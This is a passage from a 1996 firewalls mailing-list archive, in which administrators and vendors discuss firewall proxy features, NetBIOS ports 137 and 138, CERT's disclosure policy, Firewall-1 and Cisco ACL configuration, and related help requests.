firewall, everyday. regards, Dale Lancaster Senior Systems Engineer Raptor Systems At 09:08 AM 7/12/96 -0700, Bill Stout wrote: >I compared Eagle NT features with Gauntlet (I know, not fair)=20 >and compiling a list of the proxies turned out to be educational. > > Eagle NT 3.0 Gauntlet 3.1 > =B7 Transparent Telnet =B7 Transparent Telnet > =B7 Authenticated Telnet =B7 Authenticated Telnet > =B7 Transparent Http =B7 Transparent Http > =B7 Proxied Http =B7 Proxied Http > =B7 Proxied Gopher =B7 Proxied Gopher > =B7 Transparent FTP =B7 Transparent FTP > =B7 Authenticated FTP =B7 Authenticated FTP > =B7 Transparent SMTP =B7 SMAP/Sendmail > (No sendmail/mail relay =20 > capabilities) =20 The lack of sendmail replay on the NT is because I am not aware of a an actual "sendmail" server for NT. More importantly, I am not sure that we would ever recommend doing that. Sendmail is too buggy to even suggest running it on your firewall (even if one claims to have fixed all the bugs in the quarter million lines of code). That is why we developed the SMTP proxy. It doesn't just patch things through. It filters out unsafe/unnecessary SMTP commands and it also looks for and prevents the buffer overrun addressing attack. Also, the sendmail server on the firewall would slow down the overall performance due to hitting the disk. Our philosophy is to try and never touch the disk. This philosophy seems to have worked since we tested out to be the fastest firewall tested in the DataComm performance testing. > =B7 rlogin > =B7 rsh > =B7 X-11 > =B7 Finger These have been documented everywhere as things you just don't enable. That's why we disable them. Our GSP can generally handle the passage of them. Does the TIS proxy support for this do more than just pass them through? Creating a completely separate proxy is not real useful unless it is doing something intelligent like filtering out commands or data that are considered unsafe or opening and closing ports dynamically or performing user authentication. > =B7 Printer > =B7 POP3 Our GSP would handle these. Not sure what a new proxy would do to secure them any further. > =B7 Administrative GUI (info-gw) > A proxy for a admin GUI? I guess you might say we support this in that our current beta release of EagleNT supports the "remote management" feature of the firewall that we have in our Unix version. It uses an encrypted connection back to the firewall. I understand from the LAN/Times article, assuming it is correct, that the most critical functions of the TIS cannot be done from the GUI - not true for our GUI, remote or otherwise. >Non-proxied service for NNTP, Whois, Real Audio, quotd, >(unauthenticated, directionally savvy port 'service(s)'): > > =B7 Proxyd =B7 plug-gw > >Eagle also includes 'Generic pass-through', an unauthenticated,=20 >directionally clueless open port 'service'. Must be the only=20 >'real way' to punch a hole in your firewall. > Actually the GSP is direction aware and must also be allowed by a rule (which can authorize based on src/dst, and time of day. You are right that it does not authenticate on the ports. Mainly because most services that it passes are not authentication aware like NTP, NNTP, POP3, etc. If its an interactive service, then you could probably use our TELNET proxy configured via "Custom Telnet" which allows you to telnet to a port other than 23 and would support authentication. >Authentication methods supported: > > Eagle NT Gauntlet > =B7 S/Key =B7 S/Key > . Password list =B7 Enigma Logistics devices > =B7 SecureID (Security= Dynamics) > =B7 SecurNet (Digital= Pathways) > =B7 CryptoCard > =B7 DigiPass > As noted before, at the time of the NT port, SecureID did not have support for NT clients. I noticed that Cryptocard does support NT now, not sure if that was true at the time of our port. Digital Pathways just announced support for NT in March, I would assume it wasn't really production shipping until a little later. Bottom line, our Unix port supports most of the above except DigiPass and Enigma. The EagleNT version will roll in the others as the vendors support an NT version of their client code (actually a few months later due to development and test time). I would add a few more items to your list (and I will use the current beta version of our EagleNT) to compare against and I don't know the answer for TIS on some of these and have just guessed: Eagle TIS NT version of F/W Yes No (The last I talked to TIS, they did not have an NT port. Another vendor offers a port of TIS on NT, but do not know how it compares to the Unix version). DNS Proxy Yes No (This is the ability to create a split/dual-level DNS on one system. We have found that a very significant portion of customer support is related to debugging someone else's DNS environment. The DNS proxy allows a customer to create the public/private DNS desired, but with one server running on the firewall and with a simpler syntax for the database files). Automatic OS Hardening Yes Not sure (Our software auto-installs and turns off all networking services, disables all user accounts other than administrator/root and turns off IPX and NetBui. It also installs IP level code to perform anti-spoof and anti-source route code. I would guess that the TIS package does not automatically do all this - if it does, great stuff.) Continuous Integrity Check Yes Yes (Where we automatically and continuous checksum our executables (MD-5), continuously check for unauthorized services and continuously disable IP forwarding/routing.) =20 SNMP Traps on logging Yes Not sure (We can notify a central network management station via an SNMP trap for some or all of the log entries.) Suspicious Activity Monitoring Yes No (We continuously monitor the firewall for suspicious activity and create alerts and also perform automatic traceroutes back to the source of the suspicious activity). DEC Alpha NT Support Yes No TIS is a good firewall. They wouldn't be in business if it wasn't. The main difference noted in LanTimes is that Raptor is, as a whole, much easier to install and maintain verses a TIS installation. We also directly support the NT port, TIS doesn't (the last time I checked). Best regards, Dale =20 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D Dale Lancaster Web: www.raptor.com Raptor Systems "The Eagle of Firewalls" dlancaster@raptor.com =09 (214) 423-6212 Eagle - LanTimes "Best of Times" Honor - July 1996 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D From firewalls-owner Tue Jul 16 15:57:12 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA18608 for firewalls-outgoing; Tue, 16 Jul 1996 14:25:54 -0700 (PDT) Received: from rbit.co.za (rbit.co.za [196.7.71.94]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id OAA18546 for ; Tue, 16 Jul 1996 14:25:21 -0700 (PDT) Received: (from johnb@localhost) by rbit.co.za (8.7.3/8.7.3) id XAA12159 for firewalls@greatcircle.com; Tue, 16 Jul 1996 23:22:12 +0200 From: John Betts Message-Id: <199607162122.XAA12159@rbit.co.za> Subject: Re: Ports 137 & 138 To: firewalls@greatcircle.com Date: Tue, 16 Jul 1996 23:22:12 +0200 (SAT) Reply-to: johnb@aztec.co.za Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Forwarded message: From johnb Tue Jul 16 23:21:40 1996 Subject: Re: Ports 137 & 138 To: karlp@ix.netcom.com Date: Tue, 16 Jul 1996 23:21:40 +0200 (SAT) In-Reply-To: <31EBC545.4E3C@ix.netcom.com> from "Karl W. Palachuk" at Jul 16, 96 09:37:25 am Reply-to: johnb@aztec.co.za Content-Type: text Content-Length: 1367 % The old (1993) Microsoft Lan Manager and RFC 1060 define ports 137 and % 138 as udp (rather than tcp) ports. 137 is defined as nbname (net beui % name). 138 is defined as nbdatagram (net beui datagram). % firstly, that is net _bios_ (not beui) datagram... unless of course, my linux box is lying to me..... (My backup statement for this is that netbios runs over ip/ipx/netbeui, and is the transport protocol for LanMan) % Someone might be trying to access these via tcp, but of course that % would fail. % My linux box which runs samba makes netbious connections via tcp... ports 137 and 138 are both listed as both tcp AND udp in my /etc/services... # grep 137 /etc/services netbios-ns 137/tcp nbns netbios-ns 137/udp nbns # grep 138 /etc/services netbios-dgm 138/tcp nbdgm netbios-dgm 138/udp nbdgm ciao -- John P.S. Note netbios, not netbeui... P.P.S. I'm not trying to nit-pick P.P.P.S. Honestly ;) P.P.P.P.S. My mistakes and miss-assumptions are mine, and no-one elses.. if you want to claim them, you have to buy them from me :> -- John Betts, Aztec Internet Services Port Elizabeth, South Africa johnb@aztec.co.za, Tel. +27(0)41 303 475, Fax. +27(0)41 301 052 Authorised Caldera Consultant || Part of the UUNet Group The world is complex. The Sendmail configuration reflects this. -- John Betts, Aztec Internet Services Port Elizabeth, South Africa johnb@aztec.co.za, Tel. +27(0)41 303 475, Fax. +27(0)41 301 052 Authorised Caldera Consultant || Part of the UUNet Group The world is complex. The Sendmail configuration reflects this. From firewalls-owner Tue Jul 16 16:22:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA24877 for firewalls-outgoing; Tue, 16 Jul 1996 16:15:46 -0700 (PDT) Received: from dfw-ix8.ix.netcom.com (dfw-ix8.ix.netcom.com [206.214.98.8]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id QAA24864 for ; Tue, 16 Jul 1996 16:15:38 -0700 (PDT) Received: from EarlEvans.medicalogic.com ([198.107.237.35]) by dfw-ix8.ix.netcom.com (8.6.13/8.6.12) with SMTP id QAA24248 for ; Tue, 16 Jul 1996 16:12:32 -0700 Message-ID: <31EC2239.378A@ix.netcom.com> Date: Tue, 16 Jul 1996 16:14:01 -0700 From: Earl Evans Reply-To: e_evans@ix.netcom.com X-Mailer: Mozilla 3.0b5Gold (Win95; I) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: FW-1: Defining Network Objects Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi everybody, I am trying to figure out how to define some basic network objects on Firewall-1. I've read the manually thoroughly and am still confused. Perhaps some kind soul can give me a hand. My internal network is 10.x.x.x (unregistered, IANA recommendation), and is composed of a collection of subnets connected to a backbone. One of the interfaces of my Firewall-1 box will be connected to this backbone. The other interface of the FW-1 box will be connected to my DMZ, which is then routed to the Internet. My intent is to use NAT to translate the internal addresses to valid ones on the DMZ. I believe this is a fairly straightforward and common setup. I would like to create network objects which represent the internal net and the Internet so that I can proceed with entering rules in the Rule Base. My problem is understanding the specific FW-1 mechanics used to define these objects. Some specific issues: When defining a network object, the dialog box asks for a particular IP address. This is odd, because IP networks are generally designated x.y.z.0 (I'm assuming class C in this example), where x.y.z is the network portion and .0 represents the network. There is a space for the subnet mask in the dialog box...can I assume that the host portion of the address is ignored and that any host on the resultant net matches that object? Although I've used class C subnetting on the internal internetwork (multiple nets, 10.x.y.z netmask 255.255.255.0), could I use a broader mask in the FW-1 network object to represent the whole internal network - i.e., 10.x.y.z netmask 255.0.0.0? Would this work, or would I be confusing the system. Lastly, based on what the manual did contain, I'm thinking the way to represent the Internet is to first define the internal net and then use the negate feature to designate "everything else". Is this accurate? Any insight would be greatly appreciated, including the mechanics of the process. Thanks and Regards, Earl Evans -- [][][][][][][][][][][][][][][][][][][][][][][][][][][][][] [] Earl Evans "I thought, [] [] e_evans@ix.netcom.com therefore I was" [] [][][][][][][][][][][][][][][][][][][][][][][][][][][][][] From firewalls-owner Tue Jul 16 16:51:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA25028 for firewalls-outgoing; Tue, 16 Jul 1996 16:16:35 -0700 (PDT) Received: from tera.bctel.net (tera.bctel.net [204.174.64.252]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id QAA24945 for ; Tue, 16 Jul 1996 16:16:13 -0700 (PDT) Received: (from nobody@localhost) by tera.bctel.net (8.7.4/8.7.1) id QAA02191; Tue, 16 Jul 1996 16:05:57 -0700 (PDT) Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) Received: (from murrell@localhost) by mocha.bctel.net (8.7.5/8.7.3) id QAA17976; Tue, 16 Jul 1996 16:12:26 -0700 (PDT) From: Brian Murrell Message-Id: <199607162312.QAA17976@mocha.bctel.net> Date: Tue, 16 Jul 1996 16:12:25 -0700 (PDT) To: Russ.Cooper@RC.Toronto.on.ca Cc: firewalls@GreatCircle.COM Subject: RE[2]: CERT Advisories (was: Re: Dirty dogs) In-Reply-To: X-Mailer: Ishmail 1.2.2-960610-sol24 MIME-Version: 1.0 Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk from the quill of Russ on scroll > Someone from CERT previously spoke up about this in a thread at the > beginning of the year > > their opinion was simply that it didn't make a whole lot of sense to > tell the world (since its impossible to have a secure mailing list), > that a hole exists in a piece of code prior to the vendor figuring out > how to plug it. Sure, by doing so they put the pressure on the vendor to > make a fix quickly, but at the same time they also expose the possible > exploit to people whom might otherwise not have figured it out yet, > thereby leading to more exploits of the hole. Besides, putting pressure > on the vendors neither guarantees a quick fix, nor a reliable one. But what if for some the hole is big enough that plugging it means pulling the plug, and they are willing to live with that till a more graceful plug is found rather than run the risk of being exposed. Wouldn't full disclosure ASAA (as soon as available) be right for that group of people?? (Maybe they don't exist :-) b. -- Brian J. Murrell Brian_Murrell@bctel.net BCTel Advanced Communications brian@ilinx.com Vancouver, B.C. brian@wimsey.com 604 454 5279 From firewalls-owner Tue Jul 16 17:06:28 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA27094 for firewalls-outgoing; Tue, 16 Jul 1996 16:56:56 -0700 (PDT) Received: from mail.rc.toronto.on.ca ([207.6.29.231]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id QAA27085 for ; Tue, 16 Jul 1996 16:56:48 -0700 (PDT) Received: by mail.rc.toronto.on.ca with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.979.0) Message-ID: From: Russ To: "'Brian Murrell'" Cc: "'firewalls@GreatCircle.COM'" Subject: RE: RE[2]: CERT Advisories (was: Re: Dirty dogs) Date: Tue, 16 Jul 1996 19:51:26 -0400 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.979.0 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ok, we'll go through this one again. Please don't think I'm oblivious to your concerns, I understand your point. Let's assume that people would like CERT to notify everyone on their mailing list about *serious* security holes that they are made aware of, simultaneous to their notification of the vendor in question. Ok? One result is that CERT now becomes the defacto group for determining what you consider *serious*. A second result is that CERT could possibly be held liable for not notifying you of something they deem *not serious*. Since they get to decide what's serious or not, and since their the ones with their butts in a sling, they decide to just publish every breach or attempt their notified of, regardless of whether or not its actually a hole. Now some may consider this a good thing, but do you realize how much traffic this is going to create, and how much hysteria it would generate? Talk about your Denial of Service attack!!! As for the "group of people" you were referring to, as I said before, its impossible to separate them from every other legitimate email address in the world. Let's imagine that I'm a Black Hat, I'm not, but let's just imagine for a second. I work for a reputable company and I have a responsible position, but at night, with my own equipment and Internet connection, I like to MedDle iN thE mAdneSs... If I was any good, who would know? Meanwhile, every day, faithfully, CERT would be sending me the same advisories you are getting. As we all know all too well, not everyone applies the patches or pays attention to advisories. Sure, you might be fine now, but what of all the poor souls who only get their Firewall logs read once a week by an overworked Admin? You're happy and all those other people are out there screaming at CERT for publishing the advisory. Its a no-win situation for them, I believe. I think its better for them to have a simple mandate, report all reported information to the appropriate vendors as quickly as possible, and then put the pressure on the vendors who do not promptly respond (Microsoft, for example...;-]) Cheers, Russ ...running MS Exchange Server 4.0 on NT 4.0, the future is here now. > From firewalls-owner Tue Jul 16 17:48:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA28966 for firewalls-outgoing; Tue, 16 Jul 1996 17:34:41 -0700 (PDT) Received: from morebbs.com (ftp.morebbs.com [206.165.150.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id RAA28959 for ; Tue, 16 Jul 1996 17:34:34 -0700 (PDT) From: meowmyx@morebbs.com Received: by morebbs.com Message-ID: <9607162031.0STVW00@morebbs.com> Organization: MORE BBS X-Mailer: TBBS/TIGER v1.0/PRIMP 1.56p Date: Tue, 16 Jul 96 20:31:20 Subject: Re: ports 137 & 138 To: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A couple of folks asked me to give a better explanation of how packets with (IP (UDP (NetBios (Message Server Block command) ) ) ) can pose a threat on ports 137 and 138 >From what I see it works this way 1) Firewalls protect networks 2) Networks frequently contain LAN servers and PCs 3) When you do your sniffing homework and use a sniffer to examine the LAN network operating systems you see that they all follow a layered architecture and they all perform about the same Regardless of the hype from vendors In fact an application that performs poorly on one LAN operating system can usually be observed to perform poorly on other LAN operating systems 4) LAN operating system architecture is like this Networked PC LAN Server Client part of application Server part of application Reads & Writes to Microsoft MSB Reads & Writes to Microsoft MSB Banyan or Novell or Windows NT OS Banyan or Novell or Windows NT OS Some flavor of Unix Some flavor of Unix Intel based PC Intel based Server The LAN applications dont really talk to the LAN operating system. They talk to MicroSofts Message Server Block protocol which is simply transported across the network by the LAN operating system 5) MicroSofts Message Server Block protocol is the soft chewy center of the LAN communication between parts of an application You can write your own C code to read and write to Message Server Block through Redirector 6) What manner of beast would receive IP(UDP(NetBios(MSB))) packets over its network interface card and then retransmit the NetBios(MSB) part of the same packet over the same network interface card Well Windows NT and Windows 95 frequently do this And HP OpenView running on desktop HP minis will do the same thing in some configurations 7) The security of networked Windows NT machines is quite poor The security of networked Windows 95 machines is non-existant Of course YOU dont have any of these machines at YOUR site Or at least you pretend you dont know that you do Bet you didn't know that crackers can reconfigure a Windows 95 machine on the fly and reboot it WHILE STILL MAINTAINING THE ORIGINAL NETWORK CONNECTIONS In fact they can connect into it and reboot it so that it uses BootP to grab an IP address from your DHCP server WHILE STILL MAINTAINING THEIR ORIGINAL NETWORK CONNECTION from outside Seen it done Have sniffer traces to prove it 8) Back to firewalls and protecting networks If you permit people to connect into your network through ports 137, 138 or 139 you may get a nasty surprise from some sly cracker who reconfigures part of your network before your realize it At very least they may access your data and applications 9) If you are connected to the Internet and you dont run a firewall then you will get screwed in a way you dont like The only question is when I really dont think I overstated anything Everything mentioned in this post is based on sniffer traces and real life observations by myself and other cyberworld explorers MeOwMyX From firewalls-owner Tue Jul 16 18:18:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA00384 for firewalls-outgoing; Tue, 16 Jul 1996 18:02:03 -0700 (PDT) Received: from dfw-ix5.ix.netcom.com (dfw-ix5.ix.netcom.com [206.214.98.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id SAA00377 for ; Tue, 16 Jul 1996 18:01:57 -0700 (PDT) Received: from EarlEvans.medicalogic.com ([198.107.237.35]) by dfw-ix5.ix.netcom.com (8.6.13/8.6.12) with SMTP id RAA22471 for ; Tue, 16 Jul 1996 17:58:43 -0700 Message-ID: <31EC3B1D.5466@ix.netcom.com> Date: Tue, 16 Jul 1996 18:00:13 -0700 From: Earl Evans Reply-To: e_evans@ix.netcom.com X-Mailer: Mozilla 3.0b5Gold (Win95; I) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: FW-1: Network object definition Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi everybody, I am trying to figure out how to define some basic network objects on Firewall-1. I've read the manually thoroughly and am still confused. Perhaps some kind soul can give me a hand. My internal network is 10.x.x.x (unregistered, IANA recommendation), and is composed of a collection of subnets connected to a backbone. One of the interfaces of my Firewall-1 box will be connected to this backbone. The other interface of the FW-1 box will be connected to my DMZ, which is then routed to the Internet. My intent is to use NAT to translate the internal addresses to valid ones on the DMZ. I believe this is a fairly straightforward and common setup. I would like to create network objects which represent the internal net and the Internet so that I can proceed with entering rules in the Rule Base. My problem is understanding the specific FW-1 mechanics used to define these objects. Some specific issues: When defining a network object, the dialog box asks for a particular IP address. This is odd, because IP networks are generally designated x.y.z.0 (I'm assuming class C in this example), where x.y.z is the network portion and .0 represents the network. There is a space for the subnet mask in the dialog box...can I assume that the host portion of the address is ignored and that any host on the resultant net matches that object? Although I've used class C subnetting on the internal internetwork (multiple nets, 10.x.y.z netmask 255.255.255.0), could I use a broader mask in the FW-1 network object to represent the whole internal network - i.e., 10.x.y.z netmask 255.0.0.0? Would this work, or would I be confusing the system. Lastly, based on what the manual did contain, I'm thinking the way to represent the Internet is to first define the internal net and then use the negate feature to designate "everything else". Is this accurate? Any insight would be greatly appreciated, including the mechanics of the process. Thanks and Regards, Earl Evans -- [][][][][][][][][][][][][][][][][][][][][][][][][][][][][] [] Earl Evans "I thought, [] [] e_evans@ix.netcom.com therefore I was" [] [][][][][][][][][][][][][][][][][][][][][][][][][][][][][] From firewalls-owner Tue Jul 16 18:48:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA01764 for firewalls-outgoing; Tue, 16 Jul 1996 18:39:51 -0700 (PDT) Received: from mailhub.stratus.com (mailhub.stratus.com [134.111.1.14]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id SAA01746 for ; Tue, 16 Jul 1996 18:39:43 -0700 (PDT) From: Dick_Wall@stratus.com Received: from na.stratus.com (na.stratus.com [134.111.18.94]) by mailhub.stratus.com (8.7.5/8.7.3) with ESMTP id VAA08645 for ; Tue, 16 Jul 1996 21:36:16 -0400 (EDT) Received: from by na.stratus.com with SMTP X-Openmail-Hops: 1 Date: Tue, 16 Jul 96 21:34:44 -0400 Message-Id: Subject: HTTP ?? Mime-Version: 1.0 To: firewalls@greatcircle.com Content-Type: text/plain; charset=US-ASCII; name="HTTP" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Do HTTP servers "initiate" connections back to a client ... similar to an FTP server which initiates a port 21 connection back to the client ?? I seem to get hung up once in a while if my web browser is not configured to use an HTTP proxy. I expected HTTP access from server to client to work okay via our firewall routers ... the routers are set to use the "tcp established" option, to allow TCP acks back through the firewall. It normally works okay .. and some of my users say they never have a problem, when the use of a proxy is "not" configured. But occasionally I find that the requests hang. Reconfiguring the browser to use an HTTP proxy cures the problem. Note .. I am talking about HTTP requests .. and not requests to FTP links. Dick From firewalls-owner Wed Jul 17 00:48:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA10336 for firewalls-outgoing; Wed, 17 Jul 1996 00:41:01 -0700 (PDT) Received: from relay.ioffe.rssi.ru (relay.ioffe.rssi.ru [194.85.224.33]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id AAA10322 for ; Wed, 17 Jul 1996 00:40:50 -0700 (PDT) Received: from ssrouter.ioffe.rssi.ru by relay.ioffe.rssi.ru with SMTP (8.7.5/Serv-2.12-AS-eef) Date: Wed, 17 Jul 1996 07:35:18 +0400 (MSD) From: Kirill Bolshakov To: Low Taek Jho cc: firewalls Subject: Re: Need some help. In-Reply-To: <199607161355.VAA19736@relay2.jaring.my> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 16 Jul 1996, Low Taek Jho wrote: > Yo, > OK, I'm going on holiday in Aug. And I know that all my mails will fill > up my mailbox and go beyond 4 MB which is my limit on my server. I called > up the server and they said that they couldn't do anything to increase to > space. Any ideas how I could let the mails keep on comming in without my > server deleting it? thanks./. > > By, > Jho. > > You can redirect ( via .forward ) your mail to a script, which will discard/save/compress your mail. ------------------------------------------------------------------------- | Research Systems Software Laboratory | Kirill Bolshakov | | Ioffe Institute | raven@ssrouter.ioffe.rssi.ru | ------------------------------------------------------------------------- From firewalls-owner Wed Jul 17 02:33:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA14209 for firewalls-outgoing; Wed, 17 Jul 1996 02:15:04 -0700 (PDT) Received: from comsun.chungnam.ac.kr (comsun.chungnam.ac.kr [168.188.48.17]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id CAA14199 for ; Wed, 17 Jul 1996 02:14:39 -0700 (PDT) Received: from ea ([168.188.48.125]) by comsun.chungnam.ac.kr (8.6.9H1/8.9.11h) with SMTP id SAA09503 for ; Wed, 17 Jul 1996 18:12:08 +0900 Message-Id: <199607170912.SAA09503@comsun.chungnam.ac.kr> X-Sender: jypark@comsun.chungnam.ac.kr X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 17 Jul 1996 18:10:22 +1000 To: firewalls@GreatCircle.COM From: Juyoung Park Subject: [HELP] I lost root password! Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, This is an very emergency state to me! Someone broken my root password! and make it worse file system is crashing now! I use solaris 2.4, when i used sun os 4.1.3 i can modify root password by single user mode booting.. But whenever I try, it asking me root password.. Could you help me with this problem? How can I re-obtain root password? I know my asking for help is not suitable this mailing list. but nobody can help me.. Anyway, tkank you in advance.. From firewalls-owner Wed Jul 17 03:05:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA14983 for firewalls-outgoing; Wed, 17 Jul 1996 02:52:17 -0700 (PDT) Received: from rbit.co.za (rbit.co.za [196.7.71.94]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id CAA14976 for ; Wed, 17 Jul 1996 02:52:06 -0700 (PDT) Received: (from johnb@localhost) by rbit.co.za (8.7.3/8.7.3) id LAA15463 for firewalls@greatcircle.com; Wed, 17 Jul 1996 11:49:03 +0200 From: John Betts Message-Id: <199607170949.LAA15463@rbit.co.za> Subject: Cisco ACL's To: firewalls@greatcircle.com Date: Wed, 17 Jul 1996 11:49:02 +0200 (SAT) Reply-to: johnb@aztec.co.za Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Howdy can someone here please help me out with the following: I have a cisco4k with 2 serial ports, one ether. eth0 is Lan A ser0 is Lan B ser1 is the Internet line I want everyone on Lan A to be able to acess Lan B, and everyone on Lan B to be able to access Lan A. (all ports) Secondly, I want the Internet server (proxy, etc) on Lan A a.b.c.15 to be able to access any machine on the Internet, and any machine on the Internet to access it. What do I need to do to the following access lists to make the above work? ! allow Lan A access to Lan B access-list permit a.b.c.0 255.255.255.0 a.b.d.0 255.255.255.0 ! allow Lan B access to Lan A access-list permit a.b.d.0 255.255.255.0 a.b.c.0 255.255.255.0 ! allow sun1 (Internet server) access to Internet access-list permit a.b.c.15 255.255.255.? 0.0.0.0 0.0.0.0 ! allow Internet access to sun1 access-list permit 0.0.0.0 0.0.0.0 a.b.c.15 255.255.255.? ! deny everything else access-list deny 0.0.0.0 0.0.0.0 0.0.0.0 0.0.0.0 tia ciao -- John -- John Betts, Aztec Internet Services Port Elizabeth, South Africa johnb@aztec.co.za, Tel. +27(0)41 303 475, Fax. +27(0)41 301 052 Authorised Caldera Consultant || Part of the UUNet Group The world is complex. The Sendmail configuration reflects this. From firewalls-owner Wed Jul 17 03:48:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA16431 for firewalls-outgoing; Wed, 17 Jul 1996 03:41:43 -0700 (PDT) Received: from sunmail.vtx.net (mail.vtx.ch [194.51.92.4]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id DAA16422 for ; Wed, 17 Jul 1996 03:41:27 -0700 (PDT) Received: from tla03 ([194.191.78.3]) by sunmail.vtx.net Message-ID: <31ECBFCE.2889@tla.ch> Date: Wed, 17 Jul 1996 12:26:22 +0200 From: Christian ALT Reply-To: calt@tla.ch X-Mailer: Mozilla 3.0b4Gold (WinNT; I) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: Authentication necessary when encryption ? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk With encryption between a remote user's laptop and the central site, do you think that authentication is still necessary. This is the point on which i would like to exchange some thoughts. I admit that the encryption keys are unique to any user. Authentication is still necessary to access the ressources on the central site. But no more to access the site itself. In case that a laptop get lost, the site can be compromised. This is a risk we can accept or refuse. Any comment on that thought would be appreciated TIA CHA From firewalls-owner Wed Jul 17 04:03:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA16421 for firewalls-outgoing; Wed, 17 Jul 1996 03:41:27 -0700 (PDT) Received: from kpgwy.kpscal.org (kpgwy.kpscal.org [167.117.0.140]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id DAA16404 for ; Wed, 17 Jul 1996 03:41:09 -0700 (PDT) Received: from mailhub.kp.org ([206.18.242.135]) by kpgwy.kpscal.org (8.6.9/8.6.9) with SMTP id DAA28378 for ; Wed, 17 Jul 1996 03:38:48 -0700 X400-Received: by /c=us/admd=/prmd=kp/; converted ( IA5-Text); Relayed; X400-Received: by mta KPMTA in /c=us/admd=/prmd=kp/; converted ( IA5-Text); X400-MTS-Identifier: [/c=us/admd=/prmd=kp/; 31ECD0B0.CCC8.0C4C.000] Content-Identifier: 0620031ECC30A005 Content-Return: Allowed X400-Content-Type: P2-1988 ( 22 ) Conversion: Allowed Original-Encoded-Information-Types: IA5-Text Disclose-Recipients: Prohibited Alternate-Recipient: Allowed X400-Originator: Mark.Moore@kp.org X400-Recipients: non-disclosure; Expiry-Date: 01 Aug 1996 00:00: Z Date: 17 Jul 1996 03:40:10 -0700 From: "Moore, Mark" To: firewalls@GreatCircle.COM (Return requested) (Receipt notification requested) Subject: Satan Program MIME-Version: 1.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Can some on this list tell me about the satan program. Also, are there other programs like satan ? Regards, Mark From firewalls-owner Wed Jul 17 04:18:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA17621 for firewalls-outgoing; Wed, 17 Jul 1996 04:14:35 -0700 (PDT) Received: from sic.se (mailbox.sic.se [194.236.7.200]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA17614 for ; Wed, 17 Jul 1996 04:14:24 -0700 (PDT) Received: from pamela.sic.se (pamela.sic.se [194.236.7.44]) by sic.se 